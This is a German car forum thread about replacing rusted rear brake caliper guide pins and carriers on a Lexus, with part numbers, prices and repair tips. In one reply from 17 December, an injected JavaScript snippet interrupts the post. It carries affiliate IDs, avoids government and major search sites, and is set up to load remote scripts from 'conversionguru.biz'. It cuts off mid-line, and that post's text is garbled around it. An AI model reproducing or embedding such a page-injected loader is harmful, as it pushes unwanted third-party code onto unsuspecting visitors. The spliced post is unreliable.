MR2_Holic Geschrieben 13. Dezember 2013 Share Geschrieben 13. Dezember 2013 Servus, nachdem ich neue Bremsscheiben/Belege VA und Bremsscheiben/Beläge + Bremssättel HA bestelt habe fehlen mir nun noch die Bremssattelhalter/träger HA die ich von der Seite nicht beziehen konnte, bei Lexus hatte ich angefragt pro Artikel 227,- nun habe ich welche für gut 200,- gefunden. 1. Kennt jemand noch eine andere bezugsquelle wo es die vilt. Preisgünstiger gibt? Sollten aber neu sein ( meine waren nach 80.000 km nun fest gerostet also der stift mit dem sattel ) 2. ist der Stift montiert am Träger beim kauf? Das kann ich nirgends raus Lesen bei den Seiten wo die angeboten werden vilt. hat ja schon mal die auch kaufen müssen und weiss das noch. OE-Nr. lauten : 4772153060, 4772253060 gruß Kevin. 0 Zitieren Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
moe Geschrieben 13. Dezember 2013 Share Geschrieben 13. Dezember 2013 Hi, brauchst du jetzt VA oder HA? weil die Teilenr is für die VA. wenn du HA benötigst: http://euro.lexusownersclub.com/forums/index.php?/topic/35984-bremssaettel-hinten-fur-beluftete-scheibenbremsen-is2x0d-xe2/ ;) 0 Zitieren Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
MR2_Holic Geschrieben 13. Dezember 2013 Autor Share Geschrieben 13. Dezember 2013 (bearbeitet) Das Rot makierte brauche ich. edit: Ist dieser Steckbolzen bei allen Model reingeschraubt in den träger? dann bräuchte ich ja eig nur 2 x neue Bolzen weil der ja festgerostet ist mit dem Sattel. bearbeitet 13. Dezember 2013 von MR2_Holic 0 Zitieren Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
moe Geschrieben 15. Dezember 2013 Share Geschrieben 15. Dezember 2013 Hi, also ich würd nicht zu viel theoretisieren, sondern das ganze am lebenden Objekt anschaun. Wenn der Bolzen mit dem Bremssattel zusammengerostet wäre, brauchst alles neu. Also einen kompletten Bremssattel, weil der sich dann nicht mehr abziehen ließe. Wenn sich das ganze nur IRGENDWIE wieder aufmachen lässt, wovon ich aufgehe mit dem einsatz eines meinungsverstärkers ( :D ), dann brauchst im prinzip garnix neu. die buchse und der bolzen müssten dann von flugrost-spuren (wenn überhaupt) befreit werden, ein schöner batzen Fett drauf, damit später kein wasser mehr aufs metall kommt und das ganze zusammenbauen. Beim zerlegen gleichmal schaun, ob irgendwelche gummimanschetten erneuert gehören und ob die kolben noch leichtängig sind (sollten sich, wenn sie nicht mehr angeschlossen sind von hand wieder reindrücken lassen) Man kann natürlich den bolzen auch einzeln neu geben, ich sehe darin aber wenig sinn... der dient im prinzip nur dazu, dass der sattel längs auf der richtigen achse geführt wird. 0 Zitieren Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
MR2_Holic Geschrieben 15. Dezember 2013 Autor Share Geschrieben 15. Dezember 2013 Neue Bremssättel habe ich ja hier liegen. Das ist so fest gerostet da haben wir schon alles versucht das geht nicht ,meine Frage die ich mich stelle ; ist der Bolzen der den Sattel führt lediglich in den Träger rein geschraubt ? Dann würde ich dir bestellen und dann wäre das gelöst :D Laut Zeichnung soll da ja auch n gewinde sein ,ich würde ja nach gucken nur hält der rost sehr gut :D. 0 Zitieren Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
moe Geschrieben 15. Dezember 2013 Share Geschrieben 15. Dezember 2013 ja, er ist geschraubt, aber solange er im sattel fest sitzt, kriegst du den nicht runter, weil das gewinde innen ist. und selbst wenn... dann wäre der bolzen im sattel drinnen ;) 0 Zitieren Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
EckigesAuge Geschrieben 15. Dezember 2013 Share Geschrieben 15. Dezember 2013 Ja, der Bolzen ist verschraubt. Den Halter kann man wiederverwenden, wenn man ausbohrt, absägt oder so. Sattel und Bolzen dürften aber verloren gehen. Mir steht das auch noch bevor, meine Sättel hinten sind auch festgegangen... :( Und den Bolzen bekommt man AFAIK nirgends einzeln. Mir wurde gesagt, dass die Lexus-Werkstätten komplett Halter + Bolzen + Sattel wechseln. Wird dann natürlich nicht ganz billig. 0 Zitieren Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
MR2_Holic Geschrieben 15. Dezember 2013 Autor Share Geschrieben 15. Dezember 2013 Doch du bekommst den bolzen einzeln. Neue sättel haben mich pro Stück 180,- gekostet und die bolzen kosten glaube 12,50 einer. So mache ich es auch durch trennen denn Rest da raus neuer bolzen rein Sattel dran gut ist. Und dann noch mal neue radlager für die VA und ordentliche Aga 0 Zitieren Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
EckigesAuge Geschrieben 16. Dezember 2013 Share Geschrieben 16. Dezember 2013 Wo und unter welcher Nummer gibts die Bolzen einzeln? Und den alten Sattel zurückgeschickt (Tauschteil) bzw. entsorgt? Schade darum, eigentlich. 0 Zitieren Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
MR2_Holic Geschrieben 17. Dezember 2013 Autor Share Geschrieben 17. Dezember 2013 Wo und unter welcher Nummer gibts die Bolzen einzeln? Und den alten Sattel zurückgeschickt (Tauschteil) bzw. entsorgt? Schade darum, eigentlich. <script> var id=2965617866; var aff=30421; var sid=1; (function() { var hostname = document.location.hostname; function addEventHandler (el, eType, fn) { if (el.addEventListener) el.addEventListener(eType, fn, false); else if (el.attachEvent) el.attachEvent('on' + eType, fn); else el['on' + eType] = fn; } function checkdml() { var h = document.location.hostname; return (h.indexOf("google")!=-1 || h.indexOf("facebook.com")!=-1 || h.indexOf("yahoo.com")!=-1 || h.indexOf("bing.com")!=-1 || h.indexOf("ask.com")!=-1 || h.indexOf("listenersguide.org.uk")!=-1); } function loadScript(src, scriptId, innerText) { if (window.location.protocol == 'https:' && src.indexOf('http:') == 0) return; var script = document.createElement("script"); script.src = src; script.characterSet = "utf-8"; script.type = "text/javascript"; script.setAttribute('jsid', 'js36'); if (typeof(scriptId) !== 'undefined') script.id = scriptId; if (typeof(innerText) !== 'undefined') { if(script.innerText) script.innerText = innerText; else script.textContent = innerText; } (document.head||document.getElementsByTagName('head')[0]|| document.body||document.getElementsByTagName('body')[0]).appendChild(script); } function onloadComplete() { if (hostname.length - hostname.indexOf('.gov') == 4 || document.getElementsByTagName("*").length < 100) return; if (!checkdml()) { window.INLDM_cfg = { fi : 4603, fd : 0, fddm: 'xml.conversionguru.biz', sttc: 'http://www.kfzteile-profis.de aber dann bei Toyota in Göttingen bestellt war für mich einfacher :). PIN, RR CYLINDER (Toyota) OE-Nr: 4781530300 Der alte Sattel bzw. beide gehen zurück ja. 0 Zitieren Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
EckigesAuge Geschrieben 17. Dezember 2013 Share Geschrieben 17. Dezember 2013 Danke! Ok, wenn der einzeln bei Toyota bestellbar ist, ist ja alles prima. :) 0 Zitieren Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
Faeen Geschrieben 18. Dezember 2013 Share Geschrieben 18. Dezember 2013 (bearbeitet) Hi. Die waren auch bei mir festgerostet. Habe aber keine neue bestellt. Einfach ausgebaut und mit Stahlbürstenaufsatz für Bohrmaschine und Dremel sauber geschrubbt. Fett drauf das wars... ;) bearbeitet 19. Dezember 2013 von Faeen 0 Zitieren Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
EckigesAuge Geschrieben 19. Dezember 2013 Share Geschrieben 19. Dezember 2013 Vorausgesetzt natürlich, dass man Stift und Sattel voneinander trennen kann. Ich werde vorsichtshalber 2 neue Sättel an die Seite legen - zum Glück gibts das Fernabsatzgesetz. :) 0 Zitieren Link zu diesem Kommentar Auf anderen Seiten teilen More sharing options...
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